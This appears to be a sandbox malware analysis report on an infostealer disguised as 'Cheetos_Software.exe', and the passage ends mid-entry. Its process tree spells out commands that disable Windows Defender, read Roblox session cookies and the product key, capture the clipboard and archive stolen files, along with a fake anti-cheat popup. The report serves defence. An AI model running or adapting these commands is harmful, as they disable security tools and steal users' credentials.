Analysis
-
max time kernel
94s
-
max time network
98s
-
platform
windows11-21h2_x64
-
resource
win11-20240221-en
-
resource tags
arch:x64, arch:x86, image:win11-20240221-en, locale:en-us, os:windows11-21h2-x64, system
-
submitted
07-04-2024 20:08
Behavioral task
behavioral1
Sample
Cheetos_Software.exe
Resource
win10v2004-20240226-en
General
-
Target
Cheetos_Software.exe
-
Size
7.4MB
-
MD5
621451f7c4c3be3ffa015e011d02a8c0
-
SHA1
ecf6c848f7cb4444945d255e0d7dd52b8f77bccd
-
SHA256
d8b6347bd3c847455f6befbe29d412cfe44054fe9893d81a3adc32c64d9e2251
-
SHA512
73593e5820f4da948330944ddb260f232fbfe8a7cc657f6b8c085b2894c0f1cc5db51d2b9f90f47cd449e5a5d130e648b73c4cec43edfccd173eda883e8adb8d
-
SSDEEP
196608:6A8PjLjv+bhqNVoB0SEsucQZ41JBbIP11tJm:f8P3L+9qz80SJHQK1Jy1vJm
Malware Config
Signatures
-
Drops file in Drivers directory 3 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\System32\drivers\etc\hosts | Cheetos_Software.exe
File opened for modification | C:\Windows\System32\drivers\etc\hosts | attrib.exe
File opened for modification | C:\Windows\System32\drivers\etc\hosts | attrib.exe
-
Executes dropped EXE 1 IoCs
Processes:
pid | process
2104 | rar.exe
-
Loads dropped DLL 17 IoCs
Processes:
pid | process
3164 | Cheetos_Software.exe (17 identical rows, one per IoC)
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\_MEI40922\python311.dll | upx
behavioral2/memory/3164-25-0x00007FFE10250000-0x00007FFE1083E000-memory.dmp | upx
C:\Users\Admin\AppData\Local\Temp\_MEI40922\libssl-3.dll | upx
behavioral2/memory/3164-47-0x00007FFE18D50000-0x00007FFE18D74000-memory.dmp | upx
behavioral2/memory/3164-48-0x00007FFE1B030000-0x00007FFE1B03F000-memory.dmp | upx
C:\Users\Admin\AppData\Local\Temp\_MEI40922\_ssl.pyd | upx
C:\Users\Admin\AppData\Local\Temp\_MEI40922\_sqlite3.pyd | upx
C:\Users\Admin\AppData\Local\Temp\_MEI40922\_socket.pyd | upx
C:\Users\Admin\AppData\Local\Temp\_MEI40922\_queue.pyd | upx
C:\Users\Admin\AppData\Local\Temp\_MEI40922\_lzma.pyd | upx
C:\Users\Admin\AppData\Local\Temp\_MEI40922\_hashlib.pyd | upx
C:\Users\Admin\AppData\Local\Temp\_MEI40922\_decimal.pyd | upx
C:\Users\Admin\AppData\Local\Temp\_MEI40922\_bz2.pyd | upx
C:\Users\Admin\AppData\Local\Temp\_MEI40922\unicodedata.pyd | upx
C:\Users\Admin\AppData\Local\Temp\_MEI40922\sqlite3.dll | upx
C:\Users\Admin\AppData\Local\Temp\_MEI40922\select.pyd | upx
C:\Users\Admin\AppData\Local\Temp\_MEI40922\libcrypto-3.dll | upx
C:\Users\Admin\AppData\Local\Temp\_MEI40922\libffi-8.dll | upx
C:\Users\Admin\AppData\Local\Temp\_MEI40922\_ctypes.pyd | upx
behavioral2/memory/3164-54-0x00007FFE18D20000-0x00007FFE18D4D000-memory.dmp | upx
behavioral2/memory/3164-57-0x00007FFE1AE40000-0x00007FFE1AE59000-memory.dmp | upx
behavioral2/memory/3164-59-0x00007FFE18CF0000-0x00007FFE18D13000-memory.dmp | upx
behavioral2/memory/3164-62-0x00007FFE18B70000-0x00007FFE18B89000-memory.dmp | upx
behavioral2/memory/3164-70-0x00007FFE15A80000-0x00007FFE15B4D000-memory.dmp | upx
behavioral2/memory/3164-69-0x00007FFE16190000-0x00007FFE161C3000-memory.dmp | upx
behavioral2/memory/3164-71-0x00007FFE04410000-0x00007FFE04932000-memory.dmp | upx
behavioral2/memory/3164-80-0x00007FFE15960000-0x00007FFE15A7C000-memory.dmp | upx
behavioral2/memory/3164-78-0x00007FFE10250000-0x00007FFE1083E000-memory.dmp | upx
behavioral2/memory/3164-81-0x00007FFE18CE0000-0x00007FFE18CED000-memory.dmp | upx
behavioral2/memory/3164-79-0x00007FFE16170000-0x00007FFE16184000-memory.dmp | upx
behavioral2/memory/3164-64-0x00007FFE1B020000-0x00007FFE1B02D000-memory.dmp | upx
behavioral2/memory/3164-60-0x00007FFE15E30000-0x00007FFE15FA6000-memory.dmp | upx
behavioral2/memory/3164-116-0x00007FFE18D50000-0x00007FFE18D74000-memory.dmp | upx
behavioral2/memory/3164-118-0x00007FFE18CF0000-0x00007FFE18D13000-memory.dmp | upx
behavioral2/memory/3164-122-0x00007FFE18B70000-0x00007FFE18B89000-memory.dmp | upx
behavioral2/memory/3164-135-0x00007FFE16190000-0x00007FFE161C3000-memory.dmp | upx
behavioral2/memory/3164-136-0x00007FFE15A80000-0x00007FFE15B4D000-memory.dmp | upx
behavioral2/memory/3164-145-0x00007FFE04410000-0x00007FFE04932000-memory.dmp | upx
behavioral2/memory/3164-304-0x00007FFE1B020000-0x00007FFE1B02D000-memory.dmp | upx
behavioral2/memory/3164-307-0x00007FFE04410000-0x00007FFE04932000-memory.dmp | upx
behavioral2/memory/3164-310-0x00007FFE15960000-0x00007FFE15A7C000-memory.dmp | upx
behavioral2/memory/3164-309-0x00007FFE18CE0000-0x00007FFE18CED000-memory.dmp | upx
behavioral2/memory/3164-308-0x00007FFE16170000-0x00007FFE16184000-memory.dmp | upx
behavioral2/memory/3164-306-0x00007FFE15A80000-0x00007FFE15B4D000-memory.dmp | upx
behavioral2/memory/3164-305-0x00007FFE16190000-0x00007FFE161C3000-memory.dmp | upx
behavioral2/memory/3164-303-0x00007FFE18B70000-0x00007FFE18B89000-memory.dmp | upx
behavioral2/memory/3164-302-0x00007FFE15E30000-0x00007FFE15FA6000-memory.dmp | upx
behavioral2/memory/3164-301-0x00007FFE18CF0000-0x00007FFE18D13000-memory.dmp | upx
behavioral2/memory/3164-300-0x00007FFE1AE40000-0x00007FFE1AE59000-memory.dmp | upx
behavioral2/memory/3164-299-0x00007FFE18D20000-0x00007FFE18D4D000-memory.dmp | upx
behavioral2/memory/3164-298-0x00007FFE1B030000-0x00007FFE1B03F000-memory.dmp | upx
behavioral2/memory/3164-297-0x00007FFE18D50000-0x00007FFE18D74000-memory.dmp | upx
behavioral2/memory/3164-296-0x00007FFE10250000-0x00007FFE1083E000-memory.dmp | upx
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
1 | ip-api.com
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
Processes:
pid | process
1720 | tasklist.exe
4360 | tasklist.exe
1944 | tasklist.exe
4976 | tasklist.exe
-
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Suspicious behavior: EnumeratesProcesses 23 IoCs
Processes:
pid | process
4148 | powershell.exe
4772 | powershell.exe
4616 | powershell.exe
4148 | powershell.exe
4148 | powershell.exe
4772 | powershell.exe
4772 | powershell.exe
4616 | powershell.exe
4616 | powershell.exe
1416 | powershell.exe
1416 | powershell.exe
2704 | powershell.exe
2704 | powershell.exe
1416 | powershell.exe
2704 | powershell.exe
4264 | powershell.exe
4264 | powershell.exe
864 | powershell.exe
864 | powershell.exe
4876 | powershell.exe
4876 | powershell.exe
1832 | powershell.exe
1832 | powershell.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 4148 | powershell.exe
Token: SeDebugPrivilege | 4772 | powershell.exe
Token: SeDebugPrivilege | 4616 | powershell.exe
Token: SeDebugPrivilege | 1720 | tasklist.exe
Token: SeDebugPrivilege | 4360 | tasklist.exe
Token: SeDebugPrivilege | 1944 | tasklist.exe
Token: SeDebugPrivilege | 1416 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 1316 | WMIC.exe
Token: SeSecurityPrivilege | 1316 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 1316 | WMIC.exe
Token: SeLoadDriverPrivilege | 1316 | WMIC.exe
Token: SeSystemProfilePrivilege | 1316 | WMIC.exe
Token: SeSystemtimePrivilege | 1316 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 1316 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 1316 | WMIC.exe
Token: SeCreatePagefilePrivilege | 1316 | WMIC.exe
Token: SeBackupPrivilege | 1316 | WMIC.exe
Token: SeRestorePrivilege | 1316 | WMIC.exe
Token: SeShutdownPrivilege | 1316 | WMIC.exe
Token: SeDebugPrivilege | 1316 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 1316 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 1316 | WMIC.exe
Token: SeUndockPrivilege | 1316 | WMIC.exe
Token: SeManageVolumePrivilege | 1316 | WMIC.exe
Token: 33 | 1316 | WMIC.exe
Token: 34 | 1316 | WMIC.exe
Token: 35 | 1316 | WMIC.exe
Token: 36 | 1316 | WMIC.exe
Token: SeDebugPrivilege | 2704 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 1316 | WMIC.exe
Token: SeSecurityPrivilege | 1316 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 1316 | WMIC.exe
Token: SeLoadDriverPrivilege | 1316 | WMIC.exe
Token: SeSystemProfilePrivilege | 1316 | WMIC.exe
Token: SeSystemtimePrivilege | 1316 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 1316 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 1316 | WMIC.exe
Token: SeCreatePagefilePrivilege | 1316 | WMIC.exe
Token: SeBackupPrivilege | 1316 | WMIC.exe
Token: SeRestorePrivilege | 1316 | WMIC.exe
Token: SeShutdownPrivilege | 1316 | WMIC.exe
Token: SeDebugPrivilege | 1316 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 1316 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 1316 | WMIC.exe
Token: SeUndockPrivilege | 1316 | WMIC.exe
Token: SeManageVolumePrivilege | 1316 | WMIC.exe
Token: 33 | 1316 | WMIC.exe
Token: 34 | 1316 | WMIC.exe
Token: 35 | 1316 | WMIC.exe
Token: 36 | 1316 | WMIC.exe
Token: SeDebugPrivilege | 4976 | tasklist.exe
Token: SeDebugPrivilege | 4264 | powershell.exe
Token: SeDebugPrivilege | 864 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 424 | WMIC.exe
Token: SeSecurityPrivilege | 424 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 424 | WMIC.exe
Token: SeLoadDriverPrivilege | 424 | WMIC.exe
Token: SeSystemProfilePrivilege | 424 | WMIC.exe
Token: SeSystemtimePrivilege | 424 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 424 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 424 | WMIC.exe
Token: SeCreatePagefilePrivilege | 424 | WMIC.exe
Token: SeBackupPrivilege | 424 | WMIC.exe
Token: SeRestorePrivilege | 424 | WMIC.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description | pid process | target process | count
PID 4092 wrote to memory of 3164 | 4092 Cheetos_Software.exe | Cheetos_Software.exe | x2
PID 3164 wrote to memory of 4496 | 3164 Cheetos_Software.exe | cmd.exe | x2
PID 3164 wrote to memory of 3648 | 3164 Cheetos_Software.exe | cmd.exe | x2
PID 3164 wrote to memory of 900 | 3164 Cheetos_Software.exe | cmd.exe | x2
PID 3164 wrote to memory of 4752 | 3164 Cheetos_Software.exe | cmd.exe | x2
PID 4496 wrote to memory of 4616 | 4496 cmd.exe | powershell.exe | x2
PID 4752 wrote to memory of 4772 | 4752 cmd.exe | powershell.exe | x2
PID 3648 wrote to memory of 4148 | 3648 cmd.exe | powershell.exe | x2
PID 900 wrote to memory of 4856 | 900 cmd.exe | mshta.exe | x2
PID 3164 wrote to memory of 1384 | 3164 Cheetos_Software.exe | cmd.exe | x2
PID 3164 wrote to memory of 1984 | 3164 Cheetos_Software.exe | cmd.exe | x2
PID 3164 wrote to memory of 2920 | 3164 Cheetos_Software.exe | cmd.exe | x2
PID 3164 wrote to memory of 1100 | 3164 Cheetos_Software.exe | cmd.exe | x2
PID 3164 wrote to memory of 4384 | 3164 Cheetos_Software.exe | cmd.exe | x2
PID 3164 wrote to memory of 1432 | 3164 Cheetos_Software.exe | cmd.exe | x2
PID 3164 wrote to memory of 4672 | 3164 Cheetos_Software.exe | cmd.exe | x2
PID 1984 wrote to memory of 4360 | 1984 cmd.exe | tasklist.exe | x2
PID 3164 wrote to memory of 3264 | 3164 Cheetos_Software.exe | cmd.exe | x2
PID 1384 wrote to memory of 1720 | 1384 cmd.exe | tasklist.exe | x2
PID 3164 wrote to memory of 2652 | 3164 Cheetos_Software.exe | cmd.exe | x2
PID 4384 wrote to memory of 1944 | 4384 cmd.exe | tasklist.exe | x2
PID 1100 wrote to memory of 1416 | 1100 cmd.exe | powershell.exe | x2
PID 4672 wrote to memory of 984 | 4672 cmd.exe | systeminfo.exe | x2
PID 2920 wrote to memory of 1316 | 2920 cmd.exe | WMIC.exe | x2
PID 3264 wrote to memory of 964 | 3264 cmd.exe | reg.exe | x2
PID 1432 wrote to memory of 2880 | 1432 cmd.exe | tree.com | x2
PID 2652 wrote to memory of 2704 | 2652 cmd.exe | powershell.exe | x2
PID 3164 wrote to memory of 924 | 3164 Cheetos_Software.exe | cmd.exe | x2
PID 924 wrote to memory of 4020 | 924 cmd.exe | tree.com | x2
PID 3164 wrote to memory of 4784 | 3164 Cheetos_Software.exe | cmd.exe | x2
PID 3164 wrote to memory of 2988 | 3164 Cheetos_Software.exe | cmd.exe | x2
PID 2988 wrote to memory of 896 | 2988 cmd.exe | tree.com | x2
-
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
pid | process
4796 | attrib.exe
1576 | attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe (level 1)
"C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe"
- Suspicious use of WriteProcessMemory
PID:4092
-
C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe (level 2)
"C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe"
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3164
-
C:\Windows\system32\cmd.exe (level 3)
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe'"
- Suspicious use of WriteProcessMemory
PID:4496
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 4)
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Cheetos_Software.exe'
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4616
-
C:\Windows\system32\cmd.exe (level 3)
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
- Suspicious use of WriteProcessMemory
PID:3648
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 4)
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4148
-
C:\Windows\system32\cmd.exe (level 3)
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('External software found (Error code 0x100000675)', 0, 'Easy Anti Cheat', 0+16);close()""
- Suspicious use of WriteProcessMemory
PID:900
-
C:\Windows\system32\mshta.exe (level 4)
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('External software found (Error code 0x100000675)', 0, 'Easy Anti Cheat', 0+16);close()"
PID:4856
-
C:\Windows\system32\cmd.exe (level 3)
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
- Suspicious use of WriteProcessMemory
PID:4752
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 4)
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4772
-
C:\Windows\system32\cmd.exe (level 3)
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
- Suspicious use of WriteProcessMemory
PID:1384
-
C:\Windows\system32\tasklist.exe (level 4)
tasklist /FO LIST
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1720
-
C:\Windows\system32\cmd.exe (level 3)
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
- Suspicious use of WriteProcessMemory
PID:1984
-
C:\Windows\system32\tasklist.exe (level 4)
tasklist /FO LIST
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4360
-
C:\Windows\system32\cmd.exe (level 3)
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
- Suspicious use of WriteProcessMemory
PID:2920
-
C:\Windows\System32\Wbem\WMIC.exe (level 4)
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
- Suspicious use of AdjustPrivilegeToken
PID:1316
-
C:\Windows\system32\cmd.exe (level 3)
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
- Suspicious use of WriteProcessMemory
PID:1100
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 4)
powershell Get-Clipboard
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1416
-
C:\Windows\system32\cmd.exe (level 3)
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
- Suspicious use of WriteProcessMemory
PID:4384
-
C:\Windows\system32\tasklist.exe (level 4)
tasklist /FO LIST
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1944
-
C:\Windows\system32\cmd.exe (level 3)
C:\Windows\system32\cmd.exe /c "tree /A /F"
- Suspicious use of WriteProcessMemory
PID:1432
-
C:\Windows\system32\tree.com (level 4)
tree /A /F
PID:2880
-
C:\Windows\system32\cmd.exe (level 3)
C:\Windows\system32\cmd.exe /c "systeminfo"
- Suspicious use of WriteProcessMemory
PID:4672
-
C:\Windows\system32\systeminfo.exe (level 4)
systeminfo
- Gathers system information
PID:984
-
C:\Windows\system32\cmd.exe (level 3)
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
- Suspicious use of WriteProcessMemory
PID:3264
-
C:\Windows\system32\reg.exe (level 4)
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
PID:964
-
C:\Windows\system32\cmd.exe (level 3)
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
- Suspicious use of WriteProcessMemory
PID:2652
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 4)
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2704
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (level 5)
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\emviyuxo\emviyuxo.cmdline"
PID:2940
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (level 6)
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES734B.tmp" "c:\Users\Admin\AppData\Local\Temp\emviyuxo\CSC17AF24C7DE1D4780AB82FE22EAB521D.TMP"
PID:4804
-
C:\Windows\system32\cmd.exe (level 3)
C:\Windows\system32\cmd.exe /c "tree /A /F"
- Suspicious use of WriteProcessMemory
PID:924
-
C:\Windows\system32\tree.com (level 4)
tree /A /F
PID:4020
-
C:\Windows\system32\cmd.exe (level 3)
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
PID:4784
-
C:\Windows\system32\attrib.exe (level 4)
attrib -r C:\Windows\System32\drivers\etc\hosts
- Drops file in Drivers directory
- Views/modifies file attributes
PID:4796
-
C:\Windows\system32\cmd.exe (level 3)
C:\Windows\system32\cmd.exe /c "tree /A /F"
- Suspicious use of WriteProcessMemory
PID:2988
-
C:\Windows\system32\tree.com (level 4)
tree /A /F
PID:896
-
C:\Windows\system32\cmd.exe (level 3)
C:\Windows\system32\cmd.exe /c "tree /A /F"
PID:3444
-
C:\Windows\system32\tree.com (level 4)
tree /A /F
PID:2780
-
C:\Windows\system32\cmd.exe (level 3)
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
PID:5036
-
C:\Windows\system32\attrib.exe (level 4)
attrib +r C:\Windows\System32\drivers\etc\hosts
- Drops file in Drivers directory
- Views/modifies file attributes
PID:1576
-
C:\Windows\system32\cmd.exe (level 3)
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
PID:2640
-
C:\Windows\system32\tasklist.exe (level 4)
tasklist /FO LIST
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4976
-
C:\Windows\system32\cmd.exe (level 3)
C:\Windows\system32\cmd.exe /c "tree /A /F"
PID:4416
-
C:\Windows\system32\tree.com (level 4)
tree /A /F
PID:2312
-
C:\Windows\system32\cmd.exe (level 3)
C:\Windows\system32\cmd.exe /c "tree /A /F"
PID:4004
-
C:\Windows\system32\tree.com (level 4)
tree /A /F
PID:1340
-
C:\Windows\system32\cmd.exe (level 3)
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
PID:492
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 4)
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4264
-
C:\Windows\system32\cmd.exe (level 3)
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
PID:976
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 4)
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:864
-
C:\Windows\system32\cmd.exe (level 3)
C:\Windows\system32\cmd.exe /c "getmac"
PID:4712
-
C:\Windows\system32\getmac.exe (level 4)
getmac
PID:684
-
C:\Windows\system32\cmd.exe (level 3)
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI40922\rar.exe a -r -hp"Zachattack091010!" "C:\Users\Admin\AppData\Local\Temp\23Yox.zip" *"
PID:4004
-
C:\Users\Admin\AppData\Local\Temp\_MEI40922\rar.exe (level 4)
C:\Users\Admin\AppData\Local\Temp\_MEI40922\rar.exe a -r -hp"Zachattack091010!" "C:\Users\Admin\AppData\Local\Temp\23Yox.zip" *
- Executes dropped EXE
PID:2104
-
C:\Windows\system32\cmd.exe (level 3)
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
PID:2740
-
C:\Windows\System32\Wbem\WMIC.exe (level 4)
wmic os get Caption
- Suspicious use of AdjustPrivilegeToken
PID:424
-
C:\Windows\system32\cmd.exe (level 3)
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
PID:5032
-
C:\Windows\System32\Wbem\WMIC.exe (level 4)
wmic computersystem get totalphysicalmemory
PID:4260
-
C:\Windows\system32\cmd.exe (level 3)
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
PID:1800
-
C:\Windows\System32\Wbem\WMIC.exe (level 4)
wmic csproduct get uuid
PID:2912
-
C:\Windows\system32\cmd.exe (level 3)
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
PID:2052
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 4)
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
- Suspicious behavior: EnumeratesProcesses
PID:4876
-
C:\Windows\system32\cmd.exe (level 3)
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
PID:764
-
C:\Windows\System32\Wbem\WMIC.exe (level 4)
wmic path win32_VideoController get name
- Detects videocard installed
PID:32
-
C:\Windows\system32\cmd.exe (level 3)
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
PID:2768
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 4)
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
- Suspicious behavior: EnumeratesProcesses
PID:1832
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
3KB
MD5
74e4a39ae145a98de20041613220dfed
SHA1
ac5dd2331ae591d7d361e8947e1a8fba2c6bea12
SHA256
2c42785f059fe30db95b10a87f8cb64a16abc3aa47cb655443bdec747244ec36
SHA512
96ba3135875b0fe7a07a3cf26ad86e0df438730c8f38df8f10138184dacd84b8e0cded7e3e84475d11057ceefe2e357136762b9c9452fbb938c094323c6b729b
-
Filesize
944B
MD5
408641808e457ab6e23d62e59b767753
SHA1
4205cfa0dfdfee6be08e8c0041d951dcec1d3946
SHA256
3921178878eb416764a6993c4ed81a1f371040dda95c295af535563f168b4258
SHA512
e7f3ffc96c7caad3d73c5cec1e60dc6c7d5ed2ced7d265fbd3a402b6f76fed310a087d2d5f0929ab90413615dad1d54fce52875750057cffe36ff010fc6323fb
-
Filesize
1KB
MD5
9fe4cd5675481c6c8c97e2f2e9c76c96
SHA1
b97159260e37b3fa7e89852d825d8cf0583258ee
SHA256
70403ccad41d73af48ab5773271d833c64dd42e97279c281e2ef76bdbd3c6f51
SHA512
8eeab245b6e6e43347d1db6afda002afded1d419dd440823efc44375ba24817d27323c21fe33c2bda4dbd414748cd4071759651c469b6b6691117fec9835e1ac
-
Filesize
944B
MD5
aa4f31835d07347297d35862c9045f4a
SHA1
83e728008935d30f98e5480fba4fbccf10cefb05
SHA256
99c83bc5c531e49d4240700142f3425aba74e18ebcc23556be32238ffde9cce0
SHA512
ec3a4bee8335007b8753ae8ac42287f2b3bcbb258f7fc3fb15c9f8d3e611cb9bf6ae2d3034953286a34f753e9ec33f7495e064bab0e8c7fcedd75d6e5eb66629
-
Filesize
1KB
MD5
a873c13ffa169a1e672aa991ca72aeb3
SHA1
0e1e8e91738e70980ca646b91de79bb2dd0c7763
SHA256
bec3e737e684740ff59eb220c95d1cad5ba00ec305066bdb86665edbf0bdb2f5
SHA512
49d0cbedd336ae1438b43b0717b46df2af25936b5ac4a95abda02c47f7391301fe0c4d365e0e313434124d31924909db79ccad00b528210bdcc89ee96c6d9b3f
-
Filesize
1KB
MD5
0985ae117be8f70f56eb1635dda6971b
SHA1
a2030a3a416bae7ee3bb3be008655d0888572bfb
SHA256
bf51791875c3197972053173cad6bb2f836e1e786f338149836c5b58f413f934
SHA512
83afc1f898c90d4277c7115fa10b5316d4998180e723d2c8e8308edd79ee0e1b9b3142a4570f603b176d8392711d248da83baeffd583d7ada6f67f8c082a192b
-
Filesize
392KB
MD5
e4884a81fcec8733659071ac829db9ec
SHA1
3813e969372d7a40480ace6037d1109b90dda300
SHA256
011f127c82451470f373f7902088d1a27308d0cb3578033cc4bfd927262b755c
SHA512
ce5ba0792b6063abbb86feda819ee94653b7d7c18533fa6cf50ef495a5f80e48b9b4361a46f57cea30dbb4c71d4ff01bf419d81e6ae9ed1db363ed4f799fbaae
-
Filesize
1KB
MD5
95b8bb6fb4c55f85ad69465f400ef02c
SHA1
22e72292845dbaaf9531929e848fbaf7e4ba54fa
SHA256
ea30690e49091432dcdf9b4dcc698856128e543bddf2724532bd05a46e36e90d
SHA512
cf1112096fbb0801b0d870635e2c747afe3104fa1adb59861439c9e281c34feec85d28adc6bf1e26085fef10710207c9413fc494d1145e412b818b7c3368c224
-
Filesize
116KB
MD5
